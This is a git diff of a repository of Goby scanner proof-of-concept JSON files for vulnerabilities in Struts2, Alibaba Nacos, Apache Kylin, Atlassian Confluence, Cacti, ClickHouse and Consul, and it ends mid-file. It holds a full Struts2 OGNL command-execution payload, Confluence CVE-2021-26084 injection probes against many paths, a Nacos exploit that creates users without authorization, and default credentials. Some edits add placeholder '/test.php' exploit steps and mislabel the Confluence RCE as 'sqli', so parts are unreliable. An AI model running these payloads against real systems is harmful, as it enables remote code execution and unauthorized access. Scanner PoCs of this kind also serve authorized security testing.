"data": "-----------------------------18012721719170\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\nContent-Type: text/plain\n-----------------------------18012721719170"
"data": "-----------------------------18012721719170\r\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\r\nContent-Type: text/plain\r\n-----------------------------18012721719170"
},
"ResponseTest": {
"type": "group",
@ -59,7 +60,7 @@
"SetVariable": []
}
],
"ExploitSteps": [
"ExploitSteps": [
"AND",
{
"Request": {
@ -72,12 +73,12 @@
"Connection": "close",
"Cookie": "SessionId=96F3F15432E0660E0654B1CE240C4C36",
"Charsert": "UTF-8",
"Content-Type": "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='{{{Cmd}}}').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}; boundary=---------------------------18012721719170",
"Content-Type": "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='{{{cmd}}}').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}; boundary=---------------------------18012721719170",
"Cache-Control": "no-cache",
"Pragma": "no-cache"
},
"data_type": "text",
"data": "-----------------------------18012721719170\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\nContent-Type: text/plain\n-----------------------------18012721719170"
"data": "-----------------------------18012721719170\r\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\r\nContent-Type: text/plain\r\n-----------------------------18012721719170"
},
"ResponseTest": {
"type": "group",
@ -93,10 +94,10 @@
]
},
"SetVariable": [
"output|lastbody"
]
"output|lastbody|undefined|undefined"
]
}
],
"PostTime": "2021-06-28 10:08:54",
"GobyVersion": "1.8.268"
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}

69
poc/Alibaba_Nacos_Add_user_not_authorized.json
View File

@ -2,39 +2,38 @@
"Name": "Alibaba Nacos Add user not authorized",
"Level": "2",
"Tags": [
"Ultra vires"
"unauthorized"
],
"GobyQuery": "title==\"Nacos\"",
"Description": "On December 29, 2020, the Nacos official disclosed in the issue released by GitHub that there is an unauthorized access vulnerability in Alibaba Nacos due to improper handling of user agent. Through this vulnerability, the attacker can perform arbitrary operations, including creating a new user and performing post login operations.",
"GobyQuery": "title=\"Nacos\"",
"Description": "Alibaba Nacos is an easy-to-use platform designed for dynamic service discovery and configuration and service management. It helps you to build cloud native applications and microservices platform easily.",
"Product": "Alibaba Nacos",
"Homepage": "https://github.com/alibaba/nacos",
"Author": "PeiQi",
"Impact": "<p>Through this vulnerability, the attacker can perform arbitrary operations, including creating a new user and performing post login operations.<br></p>",
"Recommandation": "<p>Upgrade version<br></p>",
"References": [
"http://wiki.peiqi.tech"
],
"Author": "",
"Impact": "On December 29, 2020, the Nacos official disclosed in the issue released by GitHub that there is an unauthorized access vulnerability in Alibaba Nacos due to improper handling of user agent. Through this vulnerability, the attacker can perform arbitrary operations, including creating a new user and performing post login operations.",
"Recommendation": "update",
"References": [],
"HasExp": true,
"ExpParams": [
{
"name": "User",
"type": "input",
"value": "PeiQi",
"show": ""
},
{
"name": "Pass",
"type": "input",
"value": "PeiQi",
"show": ""
},
{
"name": "Dir",
"type": "select",
"value": "/v1/auth/users,/nacos/v1/auth/users",
"show": ""
}
],
"ExpParams": [
{
"Name": "User",
"Type": "input",
"Value": "test"
},
{
"Name": "Pass",
"Type": "input",
"Value": "test"
},
{
"Name": "Dir",
"Type": "select",
"Value": "/v1/auth/users,/nacos/v1/auth/users"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"OR",
{
@ -90,7 +89,7 @@
"SetVariable": []
}
],
"ExploitSteps": [
"ExploitSteps": [
"AND",
{
"Request": {
@ -103,7 +102,7 @@
"data_type": "text",
"data": "username={{{User}}}&password={{{Pass}}}"
},
"ResponseTest": {
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
@ -117,10 +116,10 @@
]
},
"SetVariable": [
"output|lastbody"
]
"output|lastbody|undefined|undefined"
]
}
],
"PostTime": "2021-04-04 19:56:49",
"GobyVersion": "1.8.255"
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}

65
poc/Alibaba_Nacos_Default_password.json
View File

@ -1,19 +1,23 @@
{
"Name": "Alibaba Nacos Default password",
"Name": "Alibaba Nacos Default Password",
"Level": "1",
"Tags": [
"Default password"
"Default Password"
],
"GobyQuery": "title==\"Nacos\"",
"Description": "There is a default weak password Nacos/Nacos in the Alibaba Nacos console. You can log in to the background to view sensitive information (nacos/naocs)",
"GobyQuery": "title=\"Nacos\"",
"Description": "Alibaba Nacos is an easy-to-use platform designed for dynamic service discovery and configuration and service management. It helps you to build cloud native applications and microservices platform easily.",
"Product": "Alibaba Nacos",
"Homepage": "https://github.com/alibaba/nacos",
"Author": "PeiQi",
"Impact": "<p>Log in to the background to view sensitive information<br></p>",
"Recommandation": "<p>Upgrade version</p>",
"References": [
"http://wiki.peiqi.tech"
],
"Author": "",
"Impact": "There is a default weak password Nacos/Nacos in the Alibaba Nacos console. You can login to the background to view sensitive information (nacos/naocs).",
"Recommendation": "",
"References": [],
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"OR",
{
@ -71,6 +75,43 @@
"SetVariable": []
}
],
"PostTime": "2021-04-04 18:56:41",
"GobyVersion": "1.8.255"
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}

53
poc/Apache_Airflow_Unauthorized.json
View File

@ -1,18 +1,18 @@
{
"Name": "Apache Airflow Unauthorized",
"Level": "3",
"Level": "2",
"Tags": [
"Unauthorized"
],
"GobyQuery": "app=\"APACHE-Airflow\"",
"Description": "remote attacker to gain unauthorized access to a targeted system",
"Description": "Airflow is a platform created by the community to programmatically author, schedule and monitor workflows.",
"Product": "APACHE-Airflow",
"Homepage": "https://airflow.apache.org/",
"Author": "aetkrad",
"Impact": "<p>This allowed unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs<br></p>",
"Recommendation": "",
"Author": "",
"Impact": "Acunetix determined that it was possible to access Airflow Web interface without authentication. Airflow is designed to be accessed by trusted clients inside trusted environments. It's not recommended to have it publicly accessible.",
"Recommendation": "Restrict public access and upgrade to the latest version of Airflow.",
"References": [],
"HasExp": false,
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
@ -62,6 +62,43 @@
]
}
],
"PostTime": "2021-10-31 15:32:53",
"GobyVersion": "1.8.302"
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}

61
poc/Apache_Kylin_Console_Default_password.json
View File

@ -1,19 +1,23 @@
{
"Name": "Apache Kylin Console Default password",
"Name": "Apache Kylin Console default password",
"Level": "1",
"Tags": [
"Default password"
],
"GobyQuery": "app=\"APACHE-kylin\"",
"Description": "Apache kylin console has a default weak password of admin/KYLIN, which can be further exploited by login console",
"Description": "Apache Kylin™ is an open source, distributed Analytical Data Warehouse for Big Data; it was designed to provide OLAP (Online Analytical Processing) capability in the big data era. By renovating the multi-dimensional cube and precalculation technology on Hadoop and Spark, Kylin is able to achieve near constant query speed regardless of the ever-growing data volume. Reducing query latency from minutes to sub-second, Kylin brings online analytics back to big data.",
"Product": "Apache Kylin",
"Homepage": "http://kylin.apache.org/",
"Author": "PeiQi",
"Impact": "<p>The attacker will log into the background as an administrator to further attack</p>",
"Recommandation": "<p>undefined</p>",
"References": [
"http://wiki.peiqi.tech"
],
"Author": "",
"Impact": "Apache kylin console has a default weak password of admin/KYLIN, which can be further exploited by login console.",
"Recommendation": "",
"References": [],
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
@ -51,6 +55,43 @@
"SetVariable": []
}
],
"PostTime": "2021-04-04 15:51:21",
"GobyVersion": "1.8.255"
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}

53
poc/Apache_Kylin_Unauthorized_configuration_disclosure.json
View File

@ -1,28 +1,31 @@
{
"Name": "Apache Kylin Unauthorized configuration disclosure (CVE-2020-13937)",
"Level": "0",
"Name": "Apache Kylin API Unauthorized Access CVE-2020-13937",
"Level": "1",
"Tags": [
"Disclosure of Sensitive Information"
"unauthorized"
],
"GobyQuery": "app=\"APACHE-kylin\"",
"Description": "Apache kylin has a restful API that exposes configuration information without authorization.\nAttackers can use this vulnerability to obtain sensitive information of the system.",
"Description": "Apache Kylin™ is an open source, distributed Analytical Data Warehouse for Big Data; it was designed to provide OLAP (Online Analytical Processing) capability in the big data era. By renovating the multi-dimensional cube and precalculation technology on Hadoop and Spark, Kylin is able to achieve near constant query speed regardless of the ever-growing data volume. Reducing query latency from minutes to sub-second, Kylin brings online analytics back to big data.",
"Product": "Apache kylin",
"Homepage": "http://kylin.apache.org/",
"Author": "PeiQi",
"Impact": "<p>Attackers can use this vulnerability to obtain sensitive information of the system.<br></p>",
"Recommandation": "<p>Upgrade to the safe version, or perform the following mitigation measures:</p><p>Edit \"$kylin\"_ HOME/WEB-INF/classes/ kylinSecurity.xml \"</p><p>Delete the following line \"&lt; scr:intercept-url pattern= \"/api/admin/config\" access=\"permitAll\"/&gt;\"</p><p>Restart the kylin instance to take effect.</p>",
"Author": "",
"Impact": "Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed Kylin's configuration information without any authentication, so it is dangerous because some confidential information entries will be disclosed to everyone.",
"Recommendation": "update",
"References": [
"http://wiki.peiqi.tech"
"https://nvd.nist.gov/vuln/detail/CVE-2020-13937"
],
"HasExp": true,
"ExpParams": [
{
"name": "Config",
"type": "select",
"value": "/kylin/api/admin/config",
"show": ""
}
],
"HasExp": true,
"ExpParams": [
{
"Name": "Config",
"Type": "select",
"Value": "/kylin/api/admin/config"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
@ -30,7 +33,7 @@
"method": "GET",
"uri": "/kylin/api/admin/config",
"follow_redirect": true,
"header": {},
"header": null,
"data_type": "text",
"data": ""
},
@ -57,18 +60,18 @@
"SetVariable": []
}
],
"ExploitSteps": [
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/kylin/api/admin/config",
"follow_redirect": true,
"header": {},
"header": null,
"data_type": "text",
"data": ""
},
"ResponseTest": {
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
@ -89,10 +92,10 @@
]
},
"SetVariable": [
"output|lastbody"
]
"output|lastbody|undefined|undefined"
]
}
],
"PostTime": "2021-04-04 15:55:28",
"GobyVersion": "1.8.255"
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}

12
poc/Aspcms_Backend_Leak.json
View File

@ -5,11 +5,11 @@
"infoleak"
],
"GobyQuery": "app=\"ASPCMS\"",
"Description": "aspcms /plug/oem/AspCms_OEMFun.asp leak backend url",
"Description": "aspCMS is a module based ASP Content Management System (CMS).",
"Product": "ASPCMS",
"Homepage": "https://gobies.org/",
"Author": "aetkrad",
"Impact": "<p>leak backend url<br></p>",
"Homepage": "",
"Author": "",
"Impact": "aspcms /plug/oem/AspCms_OEMFun.asp leak backend url.",
"Recommendation": "",
"References": [],
"HasExp": true,
@ -126,6 +126,6 @@
]
}
],
"PostTime": "2021-11-02 20:50:45",
"GobyVersion": "1.8.302"
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}

455
poc/Atlassian_Confluence_OGNL_injection_CVE_2021_26084.json
View File

@ -1,25 +1,32 @@
{
"Name": "Atlassian Confluence OGNL injection CVE-2021-26084",
"Name": "Atlassian Confluence OGNL Injection CVE-2021-26084",
"Level": "3",
"Tags": [
"rce"
"sqli"
],
"GobyQuery": "app=\"Confluence\"",
"Description": "Confluence is Atlassian's professional enterprise knowledge management and collaboration software, which can also be used to build enterprise wikis. Therefore, Confluence is widely used. In some cases, unauthorized attackers can construct special requests that cause remote code execution.",
"GobyQuery": "app=\"Confluence\" || product=\"Confluence\" || company=\"Atlassian\"",
"Description": "Confluence is Atlassian's professional enterprise knowledge management and collaboration software, which can also be used to build enterprise wikis.",
"Product": "Atlassian Confluence",
"Homepage": "https://www.atlassian.com",
"Author": "luckying1314@139.com",
"Impact": "<p>An OGNL injection vulnerability exists that would allow an authenticated user, and in some instances unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.<br></p>",
"Recommendation": "<p>General repair suggestions:</p><p>Check and upgrade to the secure version based on the information in the affected version. The official download link is <a href>https://www.atlassian.com/software/confluence/download-archives</a></p><p>Temporary repair suggestions:</p><p>If you are not ready to update the Confluence, please refer to the official notification calling for Mitigation for Linux and Windows operating systems.<a href>https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html</a></p>",
"Author": "",
"Impact": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.",
"Recommendation": "https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html",
"References": [
"https://github.com/alt3kx/CVE-2021-26084_PoC"
"https://nvd.nist.gov/vuln/detail/CVE-2021-26084",
"https://jira.atlassian.com/browse/CONFSERVER-67940",
"https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html"
],
"HasExp": true,
"ExpParams": [
{
"Name": "command",
"Name": "Command",
"Type": "input",
"Value": "whoami"
},
{
"Name": "Path",
"Type": "select",
"Value": "/pages/createpage-entervariables.action?SpaceKey=x,/pages/createpage-entervariables.action,/confluence/pages/createpage-entervariables.action?SpaceKey=x,/confluence/pages/createpage-entervariables.action,/wiki/pages/createpage-entervariables.action?SpaceKey=x,/wiki/pages/createpage-entervariables.action,/pages/doenterpagevariables.action,/pages/createpage.action?spaceKey=myproj,/pages/templates2/viewpagetemplate.action,/pages/createpage-entervariables.action,/template/custom/content-editor,/templates/editor-preload-container,/users/user-dark-features"
}
],
"ExpTips": {
@ -27,7 +34,7 @@
"Content": ""
},
"ScanSteps": [
"AND",
"OR",
{
"Request": {
"method": "POST",
@ -37,12 +44,8 @@
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "queryString=aaaaaaaa%5Cu0027%2B%7B{{{r1}}}%2B{{{r2}}}%7D%2B%5Cu0027",
"set_variable": [
"r1|rand|int|8",
"r2|rand|int|7",
"r4|r1|add|r2"
]
"data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
"set_variable": []
},
"ResponseTest": {
"type": "group",
@ -59,14 +62,420 @@
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "{{{r4}}}",
"value": "value=\"aaaa{140592=null}",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
"SetVariable": []
},
{
"Request": {
"method": "POST",
"uri": "/pages/createpage-entervariables.action",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "value=\"aaaa{140592=null}",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "POST",
"uri": "/confluence/pages/createpage-entervariables.action?SpaceKey=x",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "value=\"aaaa{140592=null}",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "POST",
"uri": "/confluence/pages/createpage-entervariables.action",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "value=\"aaaa{140592=null}",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "POST",
"uri": "/wiki/pages/createpage-entervariables.action?SpaceKey=x",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "value=\"aaaa{140592=null}",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "POST",
"uri": "/wiki/pages/createpage-entervariables.action",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "value=\"aaaa{140592=null}",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "POST",
"uri": "/pages/doenterpagevariables.action",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "value=\"aaaa{140592=null}",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "POST",
"uri": "/pages/createpage.action?spaceKey=myproj",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "value=\"aaaa{140592=null}",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "POST",
"uri": "/pages/templates2/viewpagetemplate.action",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "value=\"aaaa{140592=null}",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "POST",
"uri": "/pages/createpage-entervariables.action",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "value=\"aaaa{140592=null}",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "POST",
"uri": "/template/custom/content-editor",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "value=\"aaaa{140592=null}",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "POST",
"uri": "/templates/editor-preload-container",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "value=\"aaaa{140592=null}",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "POST",
"uri": "/users/user-dark-features",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "value=\"aaaa{140592=null}",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
@ -74,7 +483,7 @@
{
"Request": {
"method": "POST",
"uri": "/pages/createpage-entervariables.action?SpaceKey=x",
"uri": "{{{Path}}}",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
@ -101,6 +510,6 @@
]
}
],
"PostTime": "2021-09-03 11:27:04",
"GobyVersion": "1.8.300"
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}

14
poc/Cacti_Weathermap_File_Write.json
View File

@ -4,12 +4,12 @@
"Tags": [
"getshell"
],
"GobyQuery": "(app=\"cacti-监控系统\"|title=\"Login to Cacti\"|app=\"Cactiez\")",
"Description": "allows remote attackers to upload and execute arbitrary files",
"Product": "cacti-监控系统",
"GobyQuery": "app=\"cacti-监控系统\" || title=\"Login to Cacti\" || app=\"Cactiez\"",
"Description": "Cacti provides a robust and extensible operational monitoring and fault management framework for users around the world. Is also a complete network graphing solution designed to harness the power of RRDTool's data storage and graphing functionality.",
"Product": "cacti",
"Homepage": "https://www.cacti.net/",
"Author": "aetkrad",
"Impact": "<p>Remote attacker can use to replace web application files with malicious code and perform remote code execution on the system.<br></p>",
"Author": "",
"Impact": "Remote attacker can use to replace web application files with malicious code and perform remote code execution on the system.",
"Recommendation": "",
"References": [],
"HasExp": true,
@ -121,6 +121,6 @@
]
}
],
"PostTime": "2021-11-05 13:30:24",
"GobyVersion": "1.8.302"
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}

53
poc/ClickHouse_SQLI.json
View File

@ -4,17 +4,17 @@
"Tags": [
"sqli"
],
"GobyQuery": "(banner=\"X-Clickhouse-Summary\" | port=\"8123\")",
"Description": "ClickHouse 存在着的接口由于没有鉴权则任意访问者都可以执行SQL语句获取数据.",
"GobyQuery": "banner=\"X-Clickhouse-Summary\" || port=\"8123\"",
"Description": "ClickHouse is an open-source column-oriented DBMS for online analytical processing that allows users to generate analytical reports using SQL queries in real-time.",
"Product": "ClickHouse",
"Homepage": "https://gobies.org/",
"Author": "aetkrad",
"Impact": "",
"Homepage": "https://clickhouse.com/",
"Author": "",
"Impact": "Clickhouse has unauthorized access and can perform SQL statements to get data.",
"Recommendation": "",
"References": [
"https://mp.weixin.qq.com/s/xIc3Ic7N104iTogZul1LJA"
],
"HasExp": false,
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
@ -98,6 +98,43 @@
]
}
],
"PostTime": "2021-12-04 18:32:14",
"GobyVersion": "1.9.310"
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}

49
poc/Consul_Rexec_RCE.json
View File

@ -5,16 +5,16 @@
"rce"
],
"GobyQuery": "protocol=\"consul(http)\"",
"Description": "Under a specific configuration, a malicious attacker can remotely execute commands on the Consul server without authorization by sending a carefully constructed HTTP request",
"Description": "Consul is the control plane of the service mesh. Consul is a multi-networking tool that offers a fully-featured service mesh solution that solves the networking and security challenges of operating microservices and cloud infrastructure.",
"Product": "Consul",
"Homepage": "https://www.consul.io/",
"Author": "aetkrad",
"Impact": "",
"Author": "",
"Impact": "Under a specific configuration, a malicious attacker can remotely execute commands on the Consul server without authorization by sending a carefully constructed HTTP request.",
"Recommendation": "",
"References": [
"https://www.exploit-db.com/exploits/46073"
],
"HasExp": false,
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
@ -57,6 +57,43 @@
]
}
],
"PostTime": "2021-11-08 21:46:25",
"GobyVersion": "1.8.302"
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}

14
poc/Datang_AC_Default_Password.json
View File

@ -4,12 +4,12 @@
"Tags": [
"defaultaccount"
],
"GobyQuery": "(app=\"大唐电信AC集中管理平台\" | title=\"大唐电信AC集中管理平台\")",
"Description": "大唐AC集中管理平台默认密码admin/123456",
"Product": "大唐电信AC集中管理平台",
"GobyQuery": "app=\"大唐电信AC集中管理平台\" || title=\"大唐电信AC集中管理平台\"",
"Description": "",
